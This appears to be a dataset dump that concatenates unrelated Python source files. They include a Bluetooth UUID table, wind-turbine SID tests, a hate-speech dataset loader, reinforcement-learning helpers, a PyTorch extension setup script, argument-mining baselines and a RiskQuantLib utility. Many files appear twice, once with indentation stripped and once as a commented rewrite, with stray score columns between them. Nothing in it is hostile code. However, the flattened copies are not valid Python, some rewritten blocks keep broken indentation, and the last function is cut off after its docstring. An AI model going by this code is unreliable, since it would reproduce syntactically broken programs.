"e95db84c-251d-470a-a062-fa1922dfa9a8": "MicroBit Requirements",
"e95d9775-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Data",
"e95d23c4-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Requirements",
"e95d5404-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Events",
"e95d93b0-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control Service" "",
"e95d93b1-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control",
"e95d6100-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Service",
"e95d1b25-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Period",
# Nordic UART Port Emulation */
"6e400001-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART Service",
"6e400002-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART TX",
"6e400003-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART RX",
}
def uuidstr_to_str(uuid_):
s = uuid128_dict.get(uuid_)
if s:
return s
if not s and uuid_.endswith("-0000-1000-8000-00805f9b34fb"):
s = "Vendor specific"
v = int(uuid_[:8], 16)
if (v & 0xffff0000) == 0x0000:
s = uuid16_dict.get(v & 0x0000ffff, s)
if not s:
return "Unknown"
return s | 0.597843 | 0.46035 |
import unittest
import os
import numpy as np
from welib.yams.sid import FAST2SID
MyDir=os.path.dirname(__file__)
# --------------------------------------------------------------------------------}
# --- TESTS
# --------------------------------------------------------------------------------{
class Test(unittest.TestCase):
def test_fast2sid_twr(self):
np.set_printoptions(linewidth=300, precision=9)
# --- Read data from NREL5MW tower
EDFile=os.path.join(MyDir,'./../../../data/NREL5MW/data/NREL5MW_ED_Onshore.dat')
sid, _ = FAST2SID(EDFile, Imodes_twr=[(0,1)])
# --- Generalized mass matrix
np.testing.assert_almost_equal(np.diag(sid.Mtt), [347460.2316]*3, 5)
np.testing.assert_almost_equal(np.diag(sid.J.M0)/1e8, np.array([7.198598843e8]*2+[3.474602316e5])/1e8, 5)
np.testing.assert_almost_equal(np.diag(sid.Me.M0), [61094.66490]*2, 5)
# np.testing.assert_almost_equal(freq[0], 0.891449, 5)
# np.testing.assert_almost_equal(freq[1], 0.891449, 5)
# np.testing.assert_almost_equal(freq[-1], 5250.756553, 5)
#
np.testing.assert_almost_equal(sid.Mrt[0,1], -13265404.838207997, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgt[0,0], 104625.69072, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgt[1,1], 104625.69072, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgr[0,1], 6449889.716099, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgr[1,0],-6449889.716099, 5) # -m*zCOG
#
# --- C3 mass matrix 3 3 12 12 ie
np.testing.assert_almost_equal(sid.C3[0, 0, 0, 0, 0], 16063.6792 , 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[0, 0, 0, 6, 0], 7901.009 , 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[1, 1, 1, 1, 0], 17921.95635, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[1, 1, 5, 1, 0], 22014.56673, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[2, 2, 2, 2, 0], 17921.95635, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[2, 2,10,10, 0], 34359.12315, 5) # -m*zCOG
# --- Term for second order Cr (Mgr) terms and Oe
np.testing.assert_almost_equal(sid.Kr[2,0,1], -61094.66491, 5)
np.testing.assert_almost_equal(sid.Kr[2,1,0], 61094.66491, 5)
# --- Terms useful for 0th order of Gr, and 1st order of J
np.testing.assert_almost_equal(sid.C4[0,2,0], 6449889.7161, 4)
np.testing.assert_almost_equal(sid.C4[1,2,1], 6449889.7161, 4)
# --- Omega terms
np.testing.assert_almost_equal(sid.Kom[0][1,1], -61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[1][0,0], -61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[2][0,0], -61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[3][0,1], 61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[4][0,0], 0, 5)
np.testing.assert_almost_equal(sid.Kom[5][0,0], 0, 5)
np.testing.assert_almost_equal(sid.GKg['omxx'][0,0], 77201.43393, 5)
np.testing.assert_almost_equal(sid.GKg['omyy'][0,0], 77201.43393, 5)
np.testing.assert_almost_equal(sid.GKg['omzz'][0,0], 0, 5)
np.testing.assert_almost_equal(sid.GKg['omyz'][0,0], 0, 5)
#print(sid)
with open('_OUT_SID_TWR_PY.txt','w') as f:
f.write(str(sid).replace('-0.000000',' 0.000000'))
def test_fast2sid_bld(self):
np.set_printoptions(linewidth=300, precision=9)
# --- Read data from NREL5MW tower
EDFile=os.path.join(MyDir,'./../../../data/NREL5MW/data/NREL5MW_ED_Onshore.dat')
_, sid = FAST2SID(EDFile, Imodes_bld=[0,1])
with open('_OUT_SID_BLD_PY.txt','w') as f:
f.write(str(sid).replace('-0.000000',' 0.000000'))
if __name__=='__main__':
Test().test_fast2sid_bld()
# unittest.main() | welib/yams/tests/test_sid.py | import unittest
import os
import numpy as np
from welib.yams.sid import FAST2SID
MyDir=os.path.dirname(__file__)
# --------------------------------------------------------------------------------}
# --- TESTS
# --------------------------------------------------------------------------------{
class Test(unittest.TestCase):
    """Regression tests for FAST2SID on the NREL 5-MW ElastoDyn model.

    The numeric reference values below pin the standard-input-data (SID)
    structural terms to a previously validated run; any drift in the
    FAST2SID conversion shows up as an assertion failure.
    """
    def test_fast2sid_twr(self):
        """Tower SID: check generalized mass matrix and coupling terms."""
        np.set_printoptions(linewidth=300, precision=9)
        # --- Read data from NREL5MW tower
        EDFile=os.path.join(MyDir,'./../../../data/NREL5MW/data/NREL5MW_ED_Onshore.dat')
        sid, _ = FAST2SID(EDFile, Imodes_twr=[(0,1)])
        # --- Generalized mass matrix
        np.testing.assert_almost_equal(np.diag(sid.Mtt), [347460.2316]*3, 5)
        np.testing.assert_almost_equal(np.diag(sid.J.M0)/1e8, np.array([7.198598843e8]*2+[3.474602316e5])/1e8, 5)
        np.testing.assert_almost_equal(np.diag(sid.Me.M0), [61094.66490]*2, 5)
        # np.testing.assert_almost_equal(freq[0], 0.891449, 5)
        # np.testing.assert_almost_equal(freq[1], 0.891449, 5)
        # np.testing.assert_almost_equal(freq[-1], 5250.756553, 5)
        #
        np.testing.assert_almost_equal(sid.Mrt[0,1], -13265404.838207997, 5) # -m*zCOG
        np.testing.assert_almost_equal(sid.Mgt[0,0], 104625.69072, 5) # -m*zCOG
        np.testing.assert_almost_equal(sid.Mgt[1,1], 104625.69072, 5) # -m*zCOG
        np.testing.assert_almost_equal(sid.Mgr[0,1], 6449889.716099, 5) # -m*zCOG
        np.testing.assert_almost_equal(sid.Mgr[1,0],-6449889.716099, 5) # -m*zCOG
        #
        # --- C3 mass matrix 3 3 12 12 ie
        np.testing.assert_almost_equal(sid.C3[0, 0, 0, 0, 0], 16063.6792 , 5) # -m*zCOG
        np.testing.assert_almost_equal(sid.C3[0, 0, 0, 6, 0], 7901.009 , 5) # -m*zCOG
        np.testing.assert_almost_equal(sid.C3[1, 1, 1, 1, 0], 17921.95635, 5) # -m*zCOG
        np.testing.assert_almost_equal(sid.C3[1, 1, 5, 1, 0], 22014.56673, 5) # -m*zCOG
        np.testing.assert_almost_equal(sid.C3[2, 2, 2, 2, 0], 17921.95635, 5) # -m*zCOG
        np.testing.assert_almost_equal(sid.C3[2, 2,10,10, 0], 34359.12315, 5) # -m*zCOG
        # --- Term for second order Cr (Mgr) terms and Oe
        np.testing.assert_almost_equal(sid.Kr[2,0,1], -61094.66491, 5)
        np.testing.assert_almost_equal(sid.Kr[2,1,0], 61094.66491, 5)
        # --- Terms useful for 0th order of Gr, and 1st order of J
        np.testing.assert_almost_equal(sid.C4[0,2,0], 6449889.7161, 4)
        np.testing.assert_almost_equal(sid.C4[1,2,1], 6449889.7161, 4)
        # --- Omega terms
        np.testing.assert_almost_equal(sid.Kom[0][1,1], -61094.664906, 5)
        np.testing.assert_almost_equal(sid.Kom[1][0,0], -61094.664906, 5)
        np.testing.assert_almost_equal(sid.Kom[2][0,0], -61094.664906, 5)
        np.testing.assert_almost_equal(sid.Kom[3][0,1], 61094.664906, 5)
        np.testing.assert_almost_equal(sid.Kom[4][0,0], 0, 5)
        np.testing.assert_almost_equal(sid.Kom[5][0,0], 0, 5)
        np.testing.assert_almost_equal(sid.GKg['omxx'][0,0], 77201.43393, 5)
        np.testing.assert_almost_equal(sid.GKg['omyy'][0,0], 77201.43393, 5)
        np.testing.assert_almost_equal(sid.GKg['omzz'][0,0], 0, 5)
        np.testing.assert_almost_equal(sid.GKg['omyz'][0,0], 0, 5)
        #print(sid)
        # Regression snapshot of the full SID (normalize signed zeros first)
        with open('_OUT_SID_TWR_PY.txt','w') as f:
            f.write(str(sid).replace('-0.000000',' 0.000000'))
    def test_fast2sid_bld(self):
        """Blade SID: smoke test only, writes the SID snapshot to disk."""
        np.set_printoptions(linewidth=300, precision=9)
        # --- Read ElastoDyn model, extract blade modes 0 and 1
        EDFile=os.path.join(MyDir,'./../../../data/NREL5MW/data/NREL5MW_ED_Onshore.dat')
        _, sid = FAST2SID(EDFile, Imodes_bld=[0,1])
        with open('_OUT_SID_BLD_PY.txt','w') as f:
            f.write(str(sid).replace('-0.000000',' 0.000000'))
if __name__=='__main__':
Test().test_fast2sid_bld()
    # unittest.main()
from . import dataset
from . import helpers
import os
class Gao2018(dataset.Dataset):
name = "gao2018"
url = "https://github.com/sjtuprog/fox-news-comments/raw/master/full-comments-u.json"
hash = "059152e61f632f1e6671a68214d5618a21e6cf78f2512773e0421b9568aab8cf"
files = [
{
"name": "gao2018en.csv",
"language": "en",
"type": "training",
"platform": "fox news"
}
]
comment = """Inflammatory language explicitly or implicitly threatens or demeans a person or agroup based upon a facet of their identity such as gender, ethnicity, or sexualorientation.
- Excludes insults towards other anonymous users
- Includes insults of belief systems"""
license = """The MIT License
Copyright (c) 2010-2019 Google, Inc. http://angularjs.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE."""
@classmethod
def process(cls, tmp_file_path, dataset_folder, api_config):
tmp_file_path = helpers.convert_jsonl_to_csv(tmp_file_path)
helpers.copy_file(tmp_file_path, os.path.join(dataset_folder, "gao2018en.csv"))
@classmethod
def unify_row(cls, row):
labels = []
if row["label"] == 0:
labels.append("normal")
if row["label"] == 1:
labels.append("hate")
row["labels"] = labels
row = row.drop(["title","succ","meta","user","mentions","prev", "label"])
        return row
from . import dataset
from . import helpers
import os
class Gao2018(dataset.Dataset):
    """Fox News user-comments hate-speech dataset (Gao & Huang, 2018).

    Downloads the raw JSON comment dump from GitHub, converts it to CSV and
    maps the binary ``label`` column onto the unified ``labels`` scheme
    (``normal`` / ``hate``).
    """
    name = "gao2018"
    url = "https://github.com/sjtuprog/fox-news-comments/raw/master/full-comments-u.json"
    # Checksum of the downloaded raw file, used for integrity verification.
    hash = "059152e61f632f1e6671a68214d5618a21e6cf78f2512773e0421b9568aab8cf"
    files = [
        {
            "name": "gao2018en.csv",
            "language": "en",
            "type": "training",
            "platform": "fox news"
        }
    ]
    # Fix: two words were run together in the annotation-guideline text
    # ("agroup" -> "a group", "sexualorientation" -> "sexual orientation").
    comment = """Inflammatory language explicitly or implicitly threatens or demeans a person or a group based upon a facet of their identity such as gender, ethnicity, or sexual orientation.
    - Excludes insults towards other anonymous users
    - Includes insults of belief systems"""
    # NOTE(review): this license text names Google/AngularJS as the copyright
    # holder, which looks copy-pasted from another project -- verify against
    # the upstream fox-news-comments repository before relying on it.
    license = """The MIT License
    Copyright (c) 2010-2019 Google, Inc. http://angularjs.org
    Permission is hereby granted, free of charge, to any person obtaining a copy
    of this software and associated documentation files (the "Software"), to deal
    in the Software without restriction, including without limitation the rights
    to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
    copies of the Software, and to permit persons to whom the Software is
    furnished to do so, subject to the following conditions:
    The above copyright notice and this permission notice shall be included in
    all copies or substantial portions of the Software.
    THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
    IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
    FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
    AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
    LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
    OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
    THE SOFTWARE."""
    @classmethod
    def process(cls, tmp_file_path, dataset_folder, api_config):
        """Convert the downloaded JSON-lines dump to CSV in the dataset folder."""
        tmp_file_path = helpers.convert_jsonl_to_csv(tmp_file_path)
        helpers.copy_file(tmp_file_path, os.path.join(dataset_folder, "gao2018en.csv"))
    @classmethod
    def unify_row(cls, row):
        """Map one raw row onto the unified schema.

        The binary ``label`` column becomes a ``labels`` list
        (0 -> ``normal``, 1 -> ``hate``); raw metadata columns are dropped.
        """
        labels = []
        if row["label"] == 0:
            labels.append("normal")
        if row["label"] == 1:
            labels.append("hate")
        row["labels"] = labels
        # Drop raw metadata columns that are not part of the unified schema.
        row = row.drop(["title","succ","meta","user","mentions","prev", "label"])
        return row
import collections
import logging
import threading
import gym
import numpy as np
logger = logging.getLogger(__name__)
class WorkerTracker:
def __init__(self, global_model, model_path):
self.lock = threading.Lock()
self.global_model = global_model
self.model_path = model_path
self.global_episodes = 0
self.global_best_reward = -np.inf
self.rewards = []
self.losses = []
self.window = 50
def episode_complete(
self, index, steps, reward, loss, policy_loss=None, value_loss=None
):
with self.lock:
self.global_episodes += 1
self.rewards.append(reward)
if policy_loss is not None and value_loss is not None:
loss = [loss, policy_loss, value_loss]
self.losses.append(loss)
logger.debug(
f"Episode: {self.global_episodes}, "
f"Worker: {index}, "
f"Steps: {steps}, "
f"Reward: {np.round(reward, 1)}, "
f"Moving average: {np.round(np.mean(self.rewards[-self.window:]), 1)}, "
f"Loss: {np.round(loss, 1)}, "
f"Moving average: {np.round(np.mean(self.losses[-self.window:]), 1)}"
)
if self.global_model is not None and reward > self.global_best_reward:
logger.info(
f"New best reward: {reward} vs. {self.global_best_reward}, "
f"Saving model to: {self.model_path}"
)
with self.lock:
self.global_model.save_weights(self.model_path)
self.global_best_reward = reward
class WorkerMemory:
def __init__(self):
self.states = []
self.actions = []
self.rewards = []
def append(self, state, action, reward):
self.states.append(state)
self.actions.append(action)
self.rewards.append(reward)
def clear(self):
self.states = []
self.actions = []
self.rewards = []
def parse_env(env):
"""Parse the given environment and return useful information about it,
such as whether it is continuous or not and the size of the action space.
"""
# Determine whether input is continuous or discrete. Generally, for
# discrete actions, we will take the softmax of the output
# probabilities and for the continuous we will use the linear output,
# rescaled to the action space.
action_is_continuous = False
action_low = None
action_high = None
if isinstance(env.action_space, gym.spaces.Discrete):
action_size = env.action_space.n
else:
action_is_continuous = True
action_low = env.action_space.low
action_high = env.action_space.high
action_size = env.action_space.low.shape[0]
    return action_is_continuous, action_size, action_low, action_high
import collections
import logging
import threading
import gym
import numpy as np
logger = logging.getLogger(__name__)
class WorkerTracker:
    """Thread-safe tracker of episode statistics shared by worker threads.

    Aggregates per-episode rewards and losses across concurrent workers and
    checkpoints the global model whenever a new best episode reward is seen.
    """

    def __init__(self, global_model, model_path):
        # One lock guards every mutable attribute below; episode_complete()
        # is called concurrently from multiple worker threads.
        self.lock = threading.Lock()
        self.global_model = global_model
        self.model_path = model_path
        self.global_episodes = 0
        self.global_best_reward = -np.inf
        self.rewards = []
        self.losses = []
        # Window size for the moving-average diagnostics in the logs.
        self.window = 50

    def episode_complete(
        self, index, steps, reward, loss, policy_loss=None, value_loss=None
    ):
        """Record one finished episode and checkpoint on a new best reward.

        When both ``policy_loss`` and ``value_loss`` are given, the stored
        loss entry becomes ``[loss, policy_loss, value_loss]``.
        """
        with self.lock:
            self.global_episodes += 1
            self.rewards.append(reward)
            if policy_loss is not None and value_loss is not None:
                loss = [loss, policy_loss, value_loss]
            self.losses.append(loss)
            logger.debug(
                f"Episode: {self.global_episodes}, "
                f"Worker: {index}, "
                f"Steps: {steps}, "
                f"Reward: {np.round(reward, 1)}, "
                f"Moving average: {np.round(np.mean(self.rewards[-self.window:]), 1)}, "
                f"Loss: {np.round(loss, 1)}, "
                f"Moving average: {np.round(np.mean(self.losses[-self.window:]), 1)}"
            )
            # Bug fix: the best-reward test used to run OUTSIDE the lock and
            # the lock was re-acquired afterwards (check-then-act race): two
            # workers could both pass the test and the stale one could
            # overwrite the checkpoint last. Compare, save and update
            # atomically under the same lock instead.
            if self.global_model is not None and reward > self.global_best_reward:
                logger.info(
                    f"New best reward: {reward} vs. {self.global_best_reward}, "
                    f"Saving model to: {self.model_path}"
                )
                self.global_model.save_weights(self.model_path)
                self.global_best_reward = reward
class WorkerMemory:
    """Rollout buffer holding one worker's (state, action, reward) trajectory."""

    def __init__(self):
        # Start from an empty trajectory; clear() does exactly that.
        self.clear()

    def append(self, state, action, reward):
        """Store one transition at the end of the trajectory."""
        self.states.append(state)
        self.actions.append(action)
        self.rewards.append(reward)

    def clear(self):
        """Drop the stored trajectory by rebinding fresh empty lists."""
        self.states, self.actions, self.rewards = [], [], []
def parse_env(env):
    """Inspect a gym environment's action space.

    Binds ``action_is_continuous``, ``action_size``, ``action_low`` and
    ``action_high`` for the trailing return: discrete spaces get a softmax
    over ``n`` actions and no bounds, continuous (Box-like) spaces get
    linear outputs to be rescaled into ``[low, high]``.
    """
    space = env.action_space
    if isinstance(space, gym.spaces.Discrete):
        # Discrete: one output per action, nothing to rescale.
        action_is_continuous = False
        action_size = space.n
        action_low = None
        action_high = None
    else:
        # Continuous: keep the bounds so linear outputs can be rescaled.
        action_is_continuous = True
        action_low = space.low
        action_high = space.high
        action_size = space.low.shape[0]
    return action_is_continuous, action_size, action_low, action_high
import sys
import torch.cuda
import os
from setuptools import setup
from torch.utils.cpp_extension import BuildExtension, CppExtension, CUDAExtension
from torch.utils.cpp_extension import CUDA_HOME, ROCM_HOME
if sys.platform == 'win32':
vc_version = os.getenv('VCToolsVersion', '')
if vc_version.startswith('14.16.'):
CXX_FLAGS = ['/sdl']
else:
CXX_FLAGS = ['/sdl', '/permissive-']
else:
CXX_FLAGS = ['-g']
USE_NINJA = os.getenv('USE_NINJA') == '1'
ext_modules = [
CppExtension(
'torch_test_cpp_extension.cpp', ['extension.cpp'],
extra_compile_args=CXX_FLAGS),
CppExtension(
'torch_test_cpp_extension.msnpu', ['msnpu_extension.cpp'],
extra_compile_args=CXX_FLAGS),
CppExtension(
'torch_test_cpp_extension.rng', ['rng_extension.cpp'],
extra_compile_args=CXX_FLAGS),
]
if torch.cuda.is_available() and CUDA_HOME is not None:
extension = CUDAExtension(
'torch_test_cpp_extension.cuda', [
'cuda_extension.cpp',
'cuda_extension_kernel.cu',
'cuda_extension_kernel2.cu',
],
extra_compile_args={'cxx': CXX_FLAGS,
'nvcc': ['-O2']})
ext_modules.append(extension)
elif torch.cuda.is_available() and ROCM_HOME is not None:
from torch.utils.hipify import hipify_python
this_dir = os.path.dirname(os.path.abspath(__file__))
hipify_python.hipify(
project_directory=this_dir,
output_directory=this_dir,
includes="./*",
show_detailed=True,
is_pytorch_extension=True,)
extension = CUDAExtension(
'torch_test_cpp_extension.cuda', [
'cuda_extension.cpp',
'hip/hip_extension_kernel.hip',
'hip/hip_extension_kernel2.hip',
])
ext_modules.append(extension)
setup(
name='torch_test_cpp_extension',
packages=['torch_test_cpp_extension'],
ext_modules=ext_modules,
include_dirs='self_compiler_include_dirs_test',
    cmdclass={'build_ext': BuildExtension.with_options(use_ninja=USE_NINJA)})
import sys
import torch.cuda
import os
from setuptools import setup
from torch.utils.cpp_extension import BuildExtension, CppExtension, CUDAExtension
from torch.utils.cpp_extension import CUDA_HOME, ROCM_HOME
# Compiler flags: MSVC always gets /sdl; /permissive- is only added on
# toolchains newer than VC 14.16 (where it is reliably supported).
# Non-Windows builds compile with debug symbols.
if sys.platform == 'win32':
    vc_version = os.getenv('VCToolsVersion', '')
    if vc_version.startswith('14.16.'):
        CXX_FLAGS = ['/sdl']
    else:
        CXX_FLAGS = ['/sdl', '/permissive-']
else:
    CXX_FLAGS = ['-g']
# Opt into ninja-based extension builds via the USE_NINJA=1 env variable.
USE_NINJA = os.getenv('USE_NINJA') == '1'
# CPU-only test extensions, always built.
ext_modules = [
    CppExtension(
        'torch_test_cpp_extension.cpp', ['extension.cpp'],
        extra_compile_args=CXX_FLAGS),
    CppExtension(
        'torch_test_cpp_extension.msnpu', ['msnpu_extension.cpp'],
        extra_compile_args=CXX_FLAGS),
    CppExtension(
        'torch_test_cpp_extension.rng', ['rng_extension.cpp'],
        extra_compile_args=CXX_FLAGS),
]
# CUDA toolchain present: compile the .cu kernels with nvcc.
if torch.cuda.is_available() and CUDA_HOME is not None:
    extension = CUDAExtension(
        'torch_test_cpp_extension.cuda', [
            'cuda_extension.cpp',
            'cuda_extension_kernel.cu',
            'cuda_extension_kernel2.cu',
        ],
        extra_compile_args={'cxx': CXX_FLAGS,
                            'nvcc': ['-O2']})
    ext_modules.append(extension)
# ROCm toolchain present: hipify the CUDA sources in place, then build
# the generated HIP kernels instead.
elif torch.cuda.is_available() and ROCM_HOME is not None:
    from torch.utils.hipify import hipify_python
    this_dir = os.path.dirname(os.path.abspath(__file__))
    hipify_python.hipify(
        project_directory=this_dir,
        output_directory=this_dir,
        includes="./*",
        show_detailed=True,
        is_pytorch_extension=True,)
    extension = CUDAExtension(
        'torch_test_cpp_extension.cuda', [
            'cuda_extension.cpp',
            'hip/hip_extension_kernel.hip',
            'hip/hip_extension_kernel2.hip',
        ])
    ext_modules.append(extension)
setup(
name='torch_test_cpp_extension',
packages=['torch_test_cpp_extension'],
ext_modules=ext_modules,
include_dirs='self_compiler_include_dirs_test',
    cmdclass={'build_ext': BuildExtension.with_options(use_ninja=USE_NINJA)})
# Author: <NAME> <<EMAIL>>
# License: BSD 3-clause
import os
import numpy as np
from sklearn.metrics import precision_recall_fscore_support
from marseille.io import load_csr
from marseille.custom_logging import logging
def main():
from docopt import docopt
usage = """
Usage:
baselines (cdcp|ukp) [--n-folds=N]
Options:
--n-folds=N number of cross-val folds to generate. [default: 3]
"""
args = docopt(usage)
n_folds = int(args['--n-folds'])
all_true = []
all_false = []
adjacent = []
adjacent_ltr = []
adjacent_rtl = []
if args['cdcp']:
path = os.path.join("data", "process", "erule", "folds", "{}", "{}")
elif args['ukp']:
path = os.path.join("data", "process", "ukp-essays", "folds", "{}",
"{}")
for k in range(n_folds):
fname = path.format(k, 'val.npz')
logging.info("Loading sparse vectorized file {}".format(fname))
X_te, y_te = load_csr(fname, return_y=True)
with open(path.format(k, "fnames.txt")) as f:
fnames = [line.strip() for line in f]
props_between = fnames.index('nrm__props_between')
src_precedes_trg = fnames.index('raw__src_precedes_trg')
trg_precedes_src = fnames.index('raw__trg_precedes_src')
y_all_true = np.ones_like(y_te)
y_all_false = np.zeros_like(y_te)
y_adj = ~(X_te[:, props_between] != 0).A.ravel()
is_src_first = X_te[:, src_precedes_trg].astype(np.bool).A.ravel()
is_trg_first = X_te[:, trg_precedes_src].astype(np.bool).A.ravel()
y_adj_ltr = y_adj & is_src_first
y_adj_rtl = y_adj & is_trg_first
def _score(y):
p, r, f, _ = precision_recall_fscore_support(y_te, y, pos_label=1,
average='binary')
return p, r, f
all_true.append(_score(y_all_true))
all_false.append(_score(y_all_false))
adjacent.append(_score(y_adj))
adjacent_ltr.append(_score(y_adj_ltr))
adjacent_rtl.append(_score(y_adj_rtl))
preds = (all_false, all_true, adjacent, adjacent_ltr, adjacent_rtl)
preds = [np.array(x).mean(axis=0) for x in preds]
names = ["All false", "All true", "Adjacent", "Adj s -> t", "Adj t <- s"]
for name, scores in zip(names, preds):
print("{:18} {:.4f} {:.4f} {:.4f}".format(name, *scores))
if __name__ == '__main__':
    main()
# Author: <NAME> <<EMAIL>>
# License: BSD 3-clause
import os
import numpy as np
from sklearn.metrics import precision_recall_fscore_support
from marseille.io import load_csr
from marseille.custom_logging import logging
def main():
    """Evaluate trivial link-prediction baselines over cross-validation folds.

    For each fold's vectorized validation split, scores five dummy
    predictors (all-false, all-true, and three adjacency-based rules) with
    binary precision/recall/F1, then prints the fold-averaged scores.
    """
    from docopt import docopt

    usage = """
    Usage:
        baselines (cdcp|ukp) [--n-folds=N]
    Options:
        --n-folds=N  number of cross-val folds to generate. [default: 3]
    """

    args = docopt(usage)
    n_folds = int(args['--n-folds'])

    all_true = []
    all_false = []
    adjacent = []
    adjacent_ltr = []
    adjacent_rtl = []

    # docopt guarantees exactly one of cdcp/ukp is set.
    if args['cdcp']:
        path = os.path.join("data", "process", "erule", "folds", "{}", "{}")
    elif args['ukp']:
        path = os.path.join("data", "process", "ukp-essays", "folds", "{}",
                            "{}")

    for k in range(n_folds):
        fname = path.format(k, 'val.npz')
        logging.info("Loading sparse vectorized file {}".format(fname))
        X_te, y_te = load_csr(fname, return_y=True)

        with open(path.format(k, "fnames.txt")) as f:
            fnames = [line.strip() for line in f]

        props_between = fnames.index('nrm__props_between')
        src_precedes_trg = fnames.index('raw__src_precedes_trg')
        trg_precedes_src = fnames.index('raw__trg_precedes_src')

        y_all_true = np.ones_like(y_te)
        y_all_false = np.zeros_like(y_te)
        # A pair is "adjacent" when no other propositions lie between them.
        y_adj = ~(X_te[:, props_between] != 0).A.ravel()
        # Bug fix: np.bool was a deprecated alias of the builtin bool and was
        # removed in NumPy 1.24; astype(bool) is the equivalent, stable form.
        is_src_first = X_te[:, src_precedes_trg].astype(bool).A.ravel()
        is_trg_first = X_te[:, trg_precedes_src].astype(bool).A.ravel()
        y_adj_ltr = y_adj & is_src_first
        y_adj_rtl = y_adj & is_trg_first

        def _score(y):
            # Binary P/R/F against the fold's ground truth.
            p, r, f, _ = precision_recall_fscore_support(y_te, y, pos_label=1,
                                                         average='binary')
            return p, r, f

        all_true.append(_score(y_all_true))
        all_false.append(_score(y_all_false))
        adjacent.append(_score(y_adj))
        adjacent_ltr.append(_score(y_adj_ltr))
        adjacent_rtl.append(_score(y_adj_rtl))

    # Average each baseline's (P, R, F) over folds and print a small table.
    preds = (all_false, all_true, adjacent, adjacent_ltr, adjacent_rtl)
    preds = [np.array(x).mean(axis=0) for x in preds]
    names = ["All false", "All true", "Adjacent", "Adj s -> t", "Adj t <- s"]
    for name, scores in zip(names, preds):
        print("{:18} {:.4f} {:.4f} {:.4f}".format(name, *scores))
if __name__ == '__main__':
    main()
import sys,os,importlib
from RiskQuantLib.Tool.codeBuilderTool import pythonScriptBuilder
def convertPathToImportPath(pathString:str):
"""
convertPathToImportPath(pathString:str) is a function to convert file path to class import path.
Parameters
----------
pathString : str
The relative path of RiskQuantLib files. This path must be relative to RiskQuantLib.__init__.py
Returns
-------
classImportPath : str
The import path of RiskQuantLib files.
"""
listPathDict = pathString.split(os.sep)
className = listPathDict[-1].split('.py')[0]
classImportPath = 'RiskQuantLib.'+"".join([i+'.' for i in listPathDict[1:-1]])+className
return classImportPath
def clearShortcut(targetProjectPath:str=''):
"""
clearShortcut(targetProjectPath:str='') is a function to clear all registration of class paths.
To simplify usage of class, a shortcut will be inserted to RiskQuantLib.module for every auto-built instrument class.
After calling this function, these shortcuts will be removed, but the original source files still exist.
Parameters
----------
targetProjectPath :str
The RiskQuantLib project path where you want to remove all instrument class shortcuts.
Returns
-------
None
"""
projectPath = os.path.abspath(__file__).split('RiskQuantLib'+os.sep+'Build'+os.sep+'buildShortcut.py')[0]
if targetProjectPath == '':
path = projectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
else:
path = targetProjectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
# write shortcut path
with open(path, 'r') as f:
content = f.read()
if content.find('#-<moduleImportBegin>') == -1 or content.find('#-<moduleImportEnd>') == -1:
print("Source file must have a #-<Begin> and #-<End> tag to be built")
exit(-1)
former = content.split('#-<moduleImportBegin>')[0]
ender = content.split('#-<moduleImportEnd>')[-1]
newContent = former + '#-<moduleImportBegin>\n#-<moduleImportEnd>' + ender
with open(path, 'w') as f:
f.truncate() # clear all contents
f.write(newContent.strip(' ').strip('\t\n'))
def commitShortcut(psb:pythonScriptBuilder,targetProjectPath:str):
"""
commitShortcut(psb:pythonScriptBuilder,targetProjectPath:str) is a function to commit the change
of shortcut files. It makes modification to RiskQuantLib.module.
Parameters
----------
psb : pythonScriptBuilder
A pythonScriptBuilder object, contains the source code of shortcuts map relation.
targetProjectPath : str
The RiskQuantLib project path where you want to commit shortcut change.
Returns
-------
None
"""
